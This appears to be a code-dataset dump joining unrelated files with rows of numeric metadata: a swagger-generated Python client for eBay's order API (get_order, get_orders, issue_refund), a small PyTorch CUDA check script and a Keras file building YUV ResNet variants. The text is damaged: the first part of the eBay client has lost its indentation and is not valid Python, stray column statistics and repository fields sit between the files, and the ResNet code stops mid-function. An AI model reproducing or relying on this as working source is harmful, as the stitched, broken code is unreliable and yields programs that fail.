Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from ...sell_fulfillment.api_client import ApiClient
class OrderApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def get_order(self, order_id, **kwargs): # noqa: E501
"""get_order # noqa: E501
Use this call to retrieve the contents of an order based on its unique identifier, orderId. This value was returned in the getOrders call's orders.orderId field when you searched for orders by creation date, modification date, or fulfillment status. Include the optional fieldGroups query parameter set to TAX_BREAKDOWN to return a breakdown of the taxes and fees. The returned Order object contains information you can use to create and process fulfillments, including: Information about the buyer and seller Information about the order's line items The plans for packaging, addressing and shipping the order The status of payment, packaging, addressing, and shipping the order A summary of monetary amounts specific to the order such as pricing, payments, and shipping costs A summary of applied taxes and fees, and optionally a breakdown of each # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_order(order_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str order_id: The unique identifier of the order. Order ID values are shown in My eBay/Seller Hub, and are also returned by the getOrders method in the orders.orderId field. Note: A new order ID format was introduced to all eBay APIs (legacy and REST) in June 2019. In REST APIs that return Order IDs, including the Fulfillment API, all order IDs are returned in the new format, but the getOrder method will accept both the legacy and new format order ID. The new format is a non-parsable string, globally unique across all eBay marketplaces, and consistent for both single line item and multiple line item orders. These order identifiers will be automatically generated after buyer payment, and unlike in the past, instead of just being known and exposed to the seller, these unique order identifiers will also be known and used/referenced by the buyer and eBay customer support. (required)
:param str field_groups: The response type associated with the order. The only presently supported value is TAX_BREAKDOWN. This type returns a breakdown of tax and fee values associated with the order.
:return: Order
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_order_with_http_info(order_id, **kwargs) # noqa: E501
else:
(data) = self.get_order_with_http_info(order_id, **kwargs) # noqa: E501
return data
def get_order_with_http_info(self, order_id, **kwargs): # noqa: E501
"""get_order # noqa: E501
Use this call to retrieve the contents of an order based on its unique identifier, orderId. This value was returned in the getOrders call's orders.orderId field when you searched for orders by creation date, modification date, or fulfillment status. Include the optional fieldGroups query parameter set to TAX_BREAKDOWN to return a breakdown of the taxes and fees. The returned Order object contains information you can use to create and process fulfillments, including: Information about the buyer and seller Information about the order's line items The plans for packaging, addressing and shipping the order The status of payment, packaging, addressing, and shipping the order A summary of monetary amounts specific to the order such as pricing, payments, and shipping costs A summary of applied taxes and fees, and optionally a breakdown of each # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_order_with_http_info(order_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str order_id: The unique identifier of the order. Order ID values are shown in My eBay/Seller Hub, and are also returned by the getOrders method in the orders.orderId field. Note: A new order ID format was introduced to all eBay APIs (legacy and REST) in June 2019. In REST APIs that return Order IDs, including the Fulfillment API, all order IDs are returned in the new format, but the getOrder method will accept both the legacy and new format order ID. The new format is a non-parsable string, globally unique across all eBay marketplaces, and consistent for both single line item and multiple line item orders. These order identifiers will be automatically generated after buyer payment, and unlike in the past, instead of just being known and exposed to the seller, these unique order identifiers will also be known and used/referenced by the buyer and eBay customer support. (required)
:param str field_groups: The response type associated with the order. The only presently supported value is TAX_BREAKDOWN. This type returns a breakdown of tax and fee values associated with the order.
:return: Order
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['order_id', 'field_groups'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_order" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'order_id' is set
if ('order_id' not in params or
params['order_id'] is None):
raise ValueError("Missing the required parameter `order_id` when calling `get_order`") # noqa: E501
collection_formats = {}
path_params = {}
if 'order_id' in params:
path_params['orderId'] = params['order_id'] # noqa: E501
query_params = []
if 'field_groups' in params:
query_params.append(('fieldGroups', params['field_groups'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_auth'] # noqa: E501
return self.api_client.call_api(
'/order/{orderId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Order', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_orders(self, **kwargs):  # noqa: E501
    """get_orders  # noqa: E501

    Search for and retrieve one or more orders.  Orders can be narrowed by
    creation date, last modification date, or fulfillment status through the
    ``filter`` parameter, or requested explicitly through ``order_ids``
    (in which case every other query parameter is ignored).  Setting
    ``field_groups`` to ``TAX_BREAKDOWN`` adds a breakdown of taxes and fees
    to each returned order.

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_orders(async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str field_groups: The response type associated with the order; the only presently supported value is TAX_BREAKDOWN.
    :param str filter: One or more comma-separated criteria (creationdate, lastmodifieddate, orderfulfillmentstatus) narrowing the collection of returned orders; ignored when order_ids is supplied.
    :param str limit: The number of orders to return per page of the result set. Maximum: 1000. Default: 50. Ignored when order_ids is supplied.
    :param str offset: The number of orders to skip in the result set before returning the first order. Default: 0.
    :param str order_ids: A comma-separated list of unique order identifiers to retrieve (maximum 50).
    :return: OrderSearchPagedCollection
        If the method is called asynchronously,
        returns the request thread.
    """
    # Force the worker to hand back only the deserialized payload.  The
    # original async branch returned the request thread and the sync branch
    # unwrapped the data, but both reduce to returning the delegated call.
    kwargs['_return_http_data_only'] = True
    return self.get_orders_with_http_info(**kwargs)  # noqa: E501
def get_orders_with_http_info(self, **kwargs):  # noqa: E501
    """get_orders  # noqa: E501

    Worker behind :meth:`get_orders`: validates keyword arguments, builds
    the query string, and performs ``GET /order`` through the shared API
    client.

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_orders_with_http_info(async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str field_groups: The response type associated with the order; the only presently supported value is TAX_BREAKDOWN.
    :param str filter: One or more comma-separated criteria (creationdate, lastmodifieddate, orderfulfillmentstatus) narrowing the collection of returned orders; ignored when order_ids is supplied.
    :param str limit: The number of orders to return per page of the result set. Maximum: 1000. Default: 50. Ignored when order_ids is supplied.
    :param str offset: The number of orders to skip in the result set before returning the first order. Default: 0.
    :param str order_ids: A comma-separated list of unique order identifiers to retrieve (maximum 50); when present, all other query parameters are ignored.
    :return: OrderSearchPagedCollection
        If the method is called asynchronously,
        returns the request thread.
    """
    # Python argument name -> wire-format query parameter name, in the
    # order the request expects them to be serialized.
    query_arg_names = [
        ('field_groups', 'fieldGroups'),
        ('filter', 'filter'),
        ('limit', 'limit'),
        ('offset', 'offset'),
        ('order_ids', 'orderIds'),
    ]
    accepted = [py_name for py_name, _ in query_arg_names]
    accepted += ['async_req', '_return_http_data_only',
                 '_preload_content', '_request_timeout']
    params = {}
    for key, val in six.iteritems(kwargs):
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_orders" % key
            )
        params[key] = val

    # Only the arguments actually supplied become query parameters.
    query_params = [(wire, params[py_name])
                    for py_name, wire in query_arg_names
                    if py_name in params]

    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }

    return self.api_client.call_api(
        '/order', 'GET',
        {},                # no path parameters for this endpoint
        query_params,
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='OrderSearchPagedCollection',  # noqa: E501
        auth_settings=['api_auth'],  # noqa: E501
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def issue_refund(self, order_id, **kwargs):  # noqa: E501
    """Issue Refund  # noqa: E501

    Issue a full or partial refund to a buyer for an order (seller must be
    opted in to eBay Managed Payments).  Refunds can be issued at the order
    level or the line item level.  Processing is asynchronous on eBay's
    side: the refund status must be checked afterwards via getOrder
    (``paymentSummary.refunds.refundStatus``).

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.issue_refund(order_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str order_id: The unique identifier of the order; both legacy and REST API order ID formats are accepted. (required)
    :param IssueRefundRequest body:
    :return: Refund
        If the method is called asynchronously,
        returns the request thread.
    """
    # Both the async path (request thread) and the sync path (unwrapped
    # data) are simply whatever the worker returns once
    # _return_http_data_only is forced on.
    kwargs['_return_http_data_only'] = True
    return self.issue_refund_with_http_info(order_id, **kwargs)  # noqa: E501
def issue_refund_with_http_info(self, order_id, **kwargs):  # noqa: E501
    """Issue Refund  # noqa: E501

    Worker behind :meth:`issue_refund`: validates arguments, substitutes
    the order ID into the path, and performs
    ``POST /order/{order_id}/issue_refund`` through the shared API client.

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.issue_refund_with_http_info(order_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str order_id: The unique identifier of the order; both legacy and REST API order ID formats are accepted. (required)
    :param IssueRefundRequest body:
    :return: Refund
        If the method is called asynchronously,
        returns the request thread.
    """
    accepted = ['order_id', 'body',
                'async_req', '_return_http_data_only',
                '_preload_content', '_request_timeout']
    params = {'order_id': order_id}
    for key, val in six.iteritems(kwargs):
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method issue_refund" % key
            )
        params[key] = val

    # 'order_id' is a positional argument, so only an explicit None can
    # violate the requirement.
    if params.get('order_id') is None:
        raise ValueError("Missing the required parameter `order_id` when calling `issue_refund`")  # noqa: E501

    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
        'Content-Type': self.api_client.select_header_content_type(  # noqa: E501
            ['application/json']),  # noqa: E501
    }

    return self.api_client.call_api(
        '/order/{order_id}/issue_refund', 'POST',
        {'order_id': params['order_id']},  # path parameters
        [],                                # no query parameters
        header_params,
        body=params.get('body'),
        post_params=[],
        files={},
        response_type='Refund',  # noqa: E501
        auth_settings=['api_auth'],  # noqa: E501
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
| 97.131195
| 3,247
| 0.73118
| 4,845
| 33,316
| 4.94902
| 0.103818
| 0.016348
| 0.018017
| 0.017349
| 0.957544
| 0.950413
| 0.950413
| 0.942656
| 0.942656
| 0.938694
| 0
| 0.02295
| 0.208729
| 33,316
| 342
| 3,248
| 97.415205
| 0.886617
| 0.748019
| 0
| 0.710227
| 0
| 0
| 0.17587
| 0.033237
| 0
| 0
| 0
| 0
| 0
| 1
| 0.039773
| false
| 0
| 0.022727
| 0
| 0.119318
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
707e8c48ea530039be5ed42e93a751c948702613
| 185
|
py
|
Python
|
test.py
|
Ares-Long/Time
|
7827463613f45baea82de189a890afb7394e73e4
|
[
"Apache-2.0"
] | null | null | null |
test.py
|
Ares-Long/Time
|
7827463613f45baea82de189a890afb7394e73e4
|
[
"Apache-2.0"
] | null | null | null |
test.py
|
Ares-Long/Time
|
7827463613f45baea82de189a890afb7394e73e4
|
[
"Apache-2.0"
] | null | null | null |
import torch

# Quick smoke test: report whether this PyTorch build can use the GPU.
# (Comment translated from Chinese: "test whether the model uses the GPU".)
print(torch.cuda.is_available())   # True when a usable CUDA device is present
# empty_cache() returns None, so the original `print(torch.cuda.empty_cache())`
# only ever printed "None"; call it for its side effect instead.
torch.cuda.empty_cache()
print(torch.__version__)
print(torch.version.cuda)          # None on CPU-only builds
torch.cuda.empty_cache()
| 20.555556
| 33
| 0.756757
| 25
| 185
| 5.32
| 0.4
| 0.37594
| 0.315789
| 0.285714
| 0.360902
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.097297
| 185
| 9
| 34
| 20.555556
| 0.796407
| 0.059459
| 0
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.166667
| 0
| 0.166667
| 0.833333
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
3b43480de85ca8282ce513064c562e8d5e11dbf5
| 22,495
|
py
|
Python
|
resnet.py
|
karazijal/automatic_xcnn_topologies
|
3c17b8537650a1d3d0a95269ebce12c136a12dda
|
[
"MIT"
] | null | null | null |
resnet.py
|
karazijal/automatic_xcnn_topologies
|
3c17b8537650a1d3d0a95269ebce12c136a12dda
|
[
"MIT"
] | null | null | null |
resnet.py
|
karazijal/automatic_xcnn_topologies
|
3c17b8537650a1d3d0a95269ebce12c136a12dda
|
[
"MIT"
] | 1
|
2021-11-09T09:06:48.000Z
|
2021-11-09T09:06:48.000Z
|
from keras.models import Model
from keras.layers import Convolution2D, MaxPooling2D, Dense, Flatten, Input, BatchNormalization, Activation, AveragePooling2D, merge, Lambda
from keras.layers import SeparableConvolution2D
from keras.regularizers import l2
import math
def cf(x: float, eps=0.0001):
    """Tolerant ceiling: round ``x`` up to an int, treating values within
    ``eps`` of an integer as that integer (so float noise such as
    ``2.00005`` still yields 2 rather than 3)."""
    nudged = x - eps
    return int(math.ceil(nudged))
def get_resent_baseline(input_shape, nb_classes, init, reg, pr_axis, nb_stages):
    """Build the baseline (single-branch) pre-activation ResNet as a Keras model.

    Stem: 3x3/stride-2 conv (128 filters) + BN + ReLU; then ``nb_stages``
    residual bottleneck blocks (1x1 -> 3x3 -> 1x1, 32/32/128 filters) merged
    into the trunk by element-wise sum; head: BN + ReLU + 16x16 average pool
    + softmax dense layer.  Uses the legacy Keras 1.x functional API
    (``Convolution2D(n, h, w)``, ``merge`` — TODO confirm Keras 1.x is the
    intended target).

    :param input_shape: shape of the input tensor, excluding the batch axis.
    :param nb_classes: number of output classes for the final softmax layer.
    :param init: weight initializer passed to every convolution.
    :param reg: L2 regularization strength for convolution weights.
    :param pr_axis: channel axis for BatchNormalization (1 for channels-first,
        -1/3 for channels-last — depends on the backend; not fixed here).
    :param nb_stages: number of residual blocks to stack.
    :return: an uncompiled keras ``Model``.
    """
    i = Input(shape=input_shape)
    # Stem: downsample once with a strided 3x3 conv, then BN + ReLU.
    c0i = Convolution2D(128, 3, 3, subsample=(2, 2), border_mode='same', bias=False, init=init, W_regularizer=l2(reg),
                        name='inp_conv')(i)
    b0i = BatchNormalization(axis=pr_axis, name='inp_bn')(c0i)
    r0i = Activation('relu', name='inp_ac')(b0i)
    xspots = []  # NOTE(review): never used below — left over from the commented-out 'xm' hooks.
    stage_start = r0i
    for j in range(nb_stages):
        if j > 0:
            # x = Activation('linear',name='xm_{}'.format(j))(stage_start)
            # x = MaxPooling2D(pool_size=(1, 1), name='xm_{}'.format(j))(stage_start)
            # xspots.append('xm_{}'.format(j))
            # Pre-activation: BN + ReLU on the trunk before the 1x1 reduce conv.
            x = BatchNormalization(axis=pr_axis, name='bn_c_{}'.format(j))(stage_start)
            x = Activation('relu', name='a_c_{}'.format(j))(x)
            cs = Convolution2D(32, 1, 1, bias=False, init=init, W_regularizer=l2(reg), name='c_a_{}'.format(j))(x)
        else:
            # First block: the stem already ends in BN + ReLU, so go straight
            # to the 1x1 reduce conv.
            cs = Convolution2D(32, 1, 1, bias=False, init=init, W_regularizer=l2(reg), name='c_a_{}'.format(j))(
                stage_start)
        # Bottleneck body: BN + ReLU + 3x3 conv, BN + ReLU + 1x1 expand back to 128.
        bns = BatchNormalization(axis=pr_axis, name='bn_a_{}'.format(j))(cs)
        acs = Activation('relu', name='a_a_{}'.format(j))(bns)
        cs2 = Convolution2D(32, 3, 3, bias=False, border_mode='same', init=init, W_regularizer=l2(reg),
                            name='c_b_{}'.format(j))(acs)
        bns2 = BatchNormalization(axis=pr_axis, name='bn_b{}'.format(j))(cs2)
        acs2 = Activation('relu', name='a_b_{}'.format(j))(bns2)
        cve = Convolution2D(128, 1, 1, init=init, W_regularizer=l2(reg), name='c_c_{}'.format(j))(acs2)
        # Residual connection: element-wise sum of trunk and block output.
        stage_start = merge([stage_start, cve], mode='sum', name='+_{}'.format(j))
    # 16 + 11*24
    # Head: final BN + ReLU, global 16x16 average pool, flatten, softmax.
    bnF = BatchNormalization(axis=pr_axis, name='bn_f')(stage_start)
    rF = Activation('relu', name='a_f')(bnF)
    p = AveragePooling2D(pool_size=(16, 16), name='avp_f')(rF)  # assumes 16x16 feature maps here — TODO confirm against input_shape
    f = Flatten()(p)
    out = Dense(nb_classes, activation='softmax', name='output_softmax')(f)
    model = Model(input=i, output=out)
    return model
def get_multilayer_resnet(input_shape, nb_classes, init, reg, pr_axis, nb_stages):
    """Build a three-branch pre-activation ResNet over channel slices of the input.

    The input is split along ``pr_axis`` into three single-channel planes —
    the variable names suggest Y, U, V color planes (TODO confirm the data is
    actually YUV).  Each plane gets its own stem and its own stack of
    ``nb_stages`` residual bottleneck blocks; the branch widths are scaled so
    Y gets half the capacity and U/V a quarter each (times ``s = 1.6``).  The
    three trunks are concatenated only at the very end, before a shared
    BN/ReLU/pool/softmax head.  Uses the legacy Keras 1.x functional API.

    :param input_shape: shape of the input tensor, excluding the batch axis.
    :param nb_classes: number of output classes for the final softmax layer.
    :param init: weight initializer passed to every convolution.
    :param reg: L2 regularization strength for convolution weights.
    :param pr_axis: channel axis, used both for BatchNormalization and for
        slicing the input into the three planes.
    :param nb_stages: number of residual blocks per branch.
    :return: an uncompiled keras ``Model``.
    """
    print(init, reg, nb_stages)  # NOTE(review): debug print left in on purpose? consider logging instead
    def get_slice(axis, axis_id, input_shape):
        # Lambda layer extracting the single-channel slice `axis_id` along
        # `axis` (the +1 in range accounts for the batch dimension).
        return Lambda(
            lambda x: x[
                [slice(None) if i != axis else slice(axis_id, axis_id + 1) for i in range(len(input_shape) + 1)]],
            output_shape=[p if i + 1 != axis else 1 for i, p in enumerate(input_shape)])
    inputYUV = Input(shape=input_shape)
    # Normalize the raw input once, then split it into the three planes.
    input_bn = BatchNormalization(axis=pr_axis)(inputYUV)
    inputY = get_slice(pr_axis, 0, input_shape)(input_bn)
    inputU = get_slice(pr_axis, 1, input_shape)(input_bn)
    inputV = get_slice(pr_axis, 2, input_shape)(input_bn)
    # Per-branch width multipliers: Y gets half the budget, U and V a quarter
    # each, with an overall scale factor s.
    s = 1.6
    mY = .5*s
    mU = .25*s
    mV = .25*s
    # Per-branch stems: strided 3x3 conv + BN + ReLU (widths scaled by cf(128*m)).
    c0iY = Convolution2D(cf(128*mY), 3, 3, subsample=(2, 2), border_mode='same', bias=False, init=init, W_regularizer=l2(reg),
                         name='inp_convY')(inputY)
    b0iY = BatchNormalization(axis=pr_axis, name='inp_bnY')(c0iY)
    r0iY = Activation('relu', name='inp_acY')(b0iY)
    c0iU = Convolution2D(cf(128*mU), 3, 3, subsample=(2, 2), border_mode='same', bias=False, init=init, W_regularizer=l2(reg),
                         name='inp_convU')(inputU)
    b0iU = BatchNormalization(axis=pr_axis, name='inp_bnU')(c0iU)
    r0iU = Activation('relu', name='inp_acU')(b0iU)
    c0iV = Convolution2D(cf(128*mV), 3, 3, subsample=(2, 2), border_mode='same', bias=False, init=init, W_regularizer=l2(reg),
                         name='inp_convV')(inputV)
    b0iV = BatchNormalization(axis=pr_axis, name='inp_bnV')(c0iV)
    r0iV = Activation('relu', name='inp_acV')(b0iV)
    stage_startY = r0iY
    stage_startU = r0iU
    stage_startV = r0iV
    for i in range(nb_stages):
        # 1x1 reduce convs.  After the first block the trunk needs a fresh
        # BN + ReLU pre-activation; the stems already end in BN + ReLU.
        if i > 0:
            x = BatchNormalization(axis=pr_axis, name='bnY_c_{}'.format(i))(stage_startY)
            x = Activation('relu', name='aY_c_{}'.format(i))(x)
            csY = Convolution2D(cf(32*mY), 1, 1, bias=False, init=init, W_regularizer=l2(reg), name='cY_a_{}'.format(i))(x)
            x = BatchNormalization(axis=pr_axis, name='bnU_c_{}'.format(i))(stage_startU)
            x = Activation('relu', name='aU_c_{}'.format(i))(x)
            csU = Convolution2D(cf(32 * mU), 1, 1, bias=False, init=init, W_regularizer=l2(reg),
                                name='cU_a_{}'.format(i))(x)
            x = BatchNormalization(axis=pr_axis, name='bnV_c_{}'.format(i))(stage_startV)
            x = Activation('relu', name='aV_c_{}'.format(i))(x)
            csV = Convolution2D(cf(32 * mV), 1, 1, bias=False, init=init, W_regularizer=l2(reg),
                                name='cV_a_{}'.format(i))(x)
        else:
            csY = Convolution2D(cf(32 * mY), 1, 1, bias=False, init=init, W_regularizer=l2(reg),
                                name='cY_a_{}'.format(i))(stage_startY)
            csU = Convolution2D(cf(32 * mU), 1, 1, bias=False, init=init, W_regularizer=l2(reg),
                                name='cU_a_{}'.format(i))(stage_startU)
            csV = Convolution2D(cf(32 * mV), 1, 1, bias=False, init=init, W_regularizer=l2(reg),
                                name='cV_a_{}'.format(i))(stage_startV)
        # Y-branch bottleneck body (BN+ReLU+3x3, BN+ReLU+1x1 expand) and residual sum.
        bn = BatchNormalization(axis=pr_axis, name='bnY_a_{}'.format(i))(csY)
        ac = Activation('relu', name='aY_a_{}'.format(i))(bn)
        c = Convolution2D(cf(32 * mY), 3, 3, bias=False, border_mode='same', init=init, W_regularizer=l2(reg),
                          name='cY_b_{}'.format(i))(ac)
        bn2 = BatchNormalization(axis=pr_axis, name='bnY_b{}'.format(i))(c)
        ac2 = Activation('relu', name='aY_b_{}'.format(i))(bn2)
        c2Y = Convolution2D(cf(128 * mY), 1, 1, init=init, W_regularizer=l2(reg), name='cY_c_{}'.format(i))(ac2)
        stage_startY = merge([stage_startY, c2Y], mode='sum', name='+Y_{}'.format(i))
        # U-branch bottleneck body and residual sum.
        bn = BatchNormalization(axis=pr_axis, name='bnU_a_{}'.format(i))(csU)
        ac = Activation('relu', name='aU_a_{}'.format(i))(bn)
        c = Convolution2D(cf(32 * mU), 3, 3, bias=False, border_mode='same', init=init, W_regularizer=l2(reg),
                          name='cU_b_{}'.format(i))(ac)
        bn2 = BatchNormalization(axis=pr_axis, name='bnU_b{}'.format(i))(c)
        ac2 = Activation('relu', name='aU_b_{}'.format(i))(bn2)
        c2U = Convolution2D(cf(128 * mU), 1, 1, init=init, W_regularizer=l2(reg), name='cU_c_{}'.format(i))(ac2)
        stage_startU = merge([stage_startU, c2U], mode='sum', name='+U_{}'.format(i))
        # V-branch bottleneck body and residual sum.
        bn = BatchNormalization(axis=pr_axis, name='bnV_a_{}'.format(i))(csV)
        ac = Activation('relu', name='aV_a_{}'.format(i))(bn)
        c = Convolution2D(cf(32 * mV), 3, 3, bias=False, border_mode='same', init=init, W_regularizer=l2(reg),
                          name='cV_b_{}'.format(i))(ac)
        bn2 = BatchNormalization(axis=pr_axis, name='bnV_b{}'.format(i))(c)
        ac2 = Activation('relu', name='aV_b_{}'.format(i))(bn2)
        c2V = Convolution2D(cf(128 * mV), 1, 1, init=init, W_regularizer=l2(reg), name='cV_c_{}'.format(i))(ac2)
        stage_startV = merge([stage_startV, c2V], mode='sum', name='+V_{}'.format(i))
    # Fuse the three trunks by channel concatenation, then the shared head.
    fmerge = merge([stage_startY, stage_startU, stage_startV], mode='concat', concat_axis=pr_axis)
    bnF = BatchNormalization(axis=pr_axis, name='bn_f')(fmerge)
    rF = Activation('relu', name='a_f')(bnF)
    p = AveragePooling2D(pool_size=(16, 16), name='avp_f')(rF)  # assumes 16x16 feature maps here — TODO confirm against input_shape
    f = Flatten()(p)
    out = Dense(nb_classes, activation='softmax', name='output_softmax')(f)
    model = Model(input=inputYUV , output=out)
    return model
def get_xresnet(input_shape, nb_classes, init, reg, pr_axis, nb_stages):
    """Build a three-stream (Y/U/V) cross-connected residual network.

    The (presumably YUV) input is split along ``pr_axis`` into three
    single-channel streams.  Each stream has its own strided stem
    convolution and its own stack of bottleneck residual stages; after
    every stage the streams exchange information through small 1x1
    "cross connection" convolutions before the residual sum.

    :param input_shape: input tensor shape (without the batch axis)
    :param nb_classes: number of classes for the final softmax
    :param init: weight initialisation scheme name (Keras 1 style)
    :param reg: L2 regularisation factor
    :param pr_axis: channel axis used for slicing/concat/BatchNorm
    :param nb_stages: number of residual stages per stream
    :return: an uncompiled Keras ``Model``
    """
    print(init, reg, nb_stages)  # debug trace of the hyper-parameters

    def get_slice(axis, axis_id, input_shape):
        # Lambda selecting a single plane (index `axis_id`) along `axis`
        # while keeping every other axis intact.  `len(input_shape) + 1`
        # accounts for the batch dimension present at runtime; the
        # output_shape similarly offsets `axis` by one (no batch dim).
        return Lambda(
            lambda x: x[
                [slice(None) if i != axis else slice(axis_id, axis_id + 1) for i in range(len(input_shape) + 1)]],
            output_shape=[p if i + 1 != axis else 1 for i, p in enumerate(input_shape)])

    inputYUV = Input(shape=input_shape)
    input_bn = BatchNormalization(axis=pr_axis)(inputYUV)
    # One single-channel stream per colour plane.
    inputY = get_slice(pr_axis, 0, input_shape)(input_bn)
    inputU = get_slice(pr_axis, 1, input_shape)(input_bn)
    inputV = get_slice(pr_axis, 2, input_shape)(input_bn)
    # Width multipliers: Y gets half the capacity, U and V a quarter each,
    # all scaled by s.
    s = 1.6
    mY = .5 * s
    mU = .25 * s
    mV = .25 * s
    # Strided 3x3 stem convolutions (one per stream), each followed by
    # BatchNorm + ReLU.
    c0iY = Convolution2D(cf(128 * mY), 3, 3, subsample=(2, 2), border_mode='same', bias=False, init=init,
                         W_regularizer=l2(reg),
                         name='inp_convY')(inputY)
    b0iY = BatchNormalization(axis=pr_axis, name='inp_bnY')(c0iY)
    r0iY = Activation('relu', name='inp_acY')(b0iY)
    c0iU = Convolution2D(cf(128 * mU), 3, 3, subsample=(2, 2), border_mode='same', bias=False, init=init,
                         W_regularizer=l2(reg),
                         name='inp_convU')(inputU)
    b0iU = BatchNormalization(axis=pr_axis, name='inp_bnU')(c0iU)
    r0iU = Activation('relu', name='inp_acU')(b0iU)
    c0iV = Convolution2D(cf(128 * mV), 3, 3, subsample=(2, 2), border_mode='same', bias=False, init=init,
                         W_regularizer=l2(reg),
                         name='inp_convV')(inputV)
    b0iV = BatchNormalization(axis=pr_axis, name='inp_bnV')(c0iV)
    r0iV = Activation('relu', name='inp_acV')(b0iV)
    stage_startY = r0iY
    stage_startU = r0iU
    stage_startV = r0iV
    # Initial cross-connection round, tagged 'acc' in layer names.  Y
    # contributes 16 channels to each other stream; U and V contribute 8.
    # NOTE: `i` here is a string suffix; the loop below rebinds it to ints.
    i = 'acc'
    Y_to_U = Convolution2D(16, 1, 1, init=init, activation='relu', name='YtoU_{}'.format(i))(stage_startY)
    Y_to_V = Convolution2D(16, 1, 1, init=init, activation='relu', name='YtoV_{}'.format(i))(stage_startY)
    U_to_Y = Convolution2D(8, 1, 1, init=init, activation='relu', name='UtoY_{}'.format(i))(stage_startU)
    U_to_V = Convolution2D(8, 1, 1, init=init, activation='relu', name='UtoV_{}'.format(i))(stage_startU)
    V_to_Y = Convolution2D(8, 1, 1, init=init, activation='relu', name='VtoY_{}'.format(i))(stage_startV)
    V_to_U = Convolution2D(8, 1, 1, init=init, activation='relu', name='VtoU_{}'.format(i))(stage_startV)
    stage_startY = merge([stage_startY, U_to_Y, V_to_Y], mode='concat', concat_axis=pr_axis, name='XY_{}'.format(i))
    stage_startU = merge([stage_startU, Y_to_U, V_to_U], mode='concat', concat_axis=pr_axis, name='XU_{}'.format(i))
    stage_startV = merge([stage_startV, Y_to_V, U_to_V], mode='concat', concat_axis=pr_axis, name='XV_{}'.format(i))
    for i in range(nb_stages):
        if i > 0:
            # Pre-activation (BN + ReLU) before the 1x1 bottleneck entry;
            # skipped on stage 0 whose input already ends in an activation.
            x = BatchNormalization(axis=pr_axis, name='bnY_c_{}'.format(i))(stage_startY)
            x = Activation('relu', name='aY_c_{}'.format(i))(x)
            csY = Convolution2D(cf(32 * mY), 1, 1, bias=False, init=init, W_regularizer=l2(reg),
                                name='cY_a_{}'.format(i))(x)
            x = BatchNormalization(axis=pr_axis, name='bnU_c_{}'.format(i))(stage_startU)
            x = Activation('relu', name='aU_c_{}'.format(i))(x)
            csU = Convolution2D(cf(32 * mU), 1, 1, bias=False, init=init, W_regularizer=l2(reg),
                                name='cU_a_{}'.format(i))(x)
            x = BatchNormalization(axis=pr_axis, name='bnV_c_{}'.format(i))(stage_startV)
            x = Activation('relu', name='aV_c_{}'.format(i))(x)
            csV = Convolution2D(cf(32 * mV), 1, 1, bias=False, init=init, W_regularizer=l2(reg),
                                name='cV_a_{}'.format(i))(x)
        else:
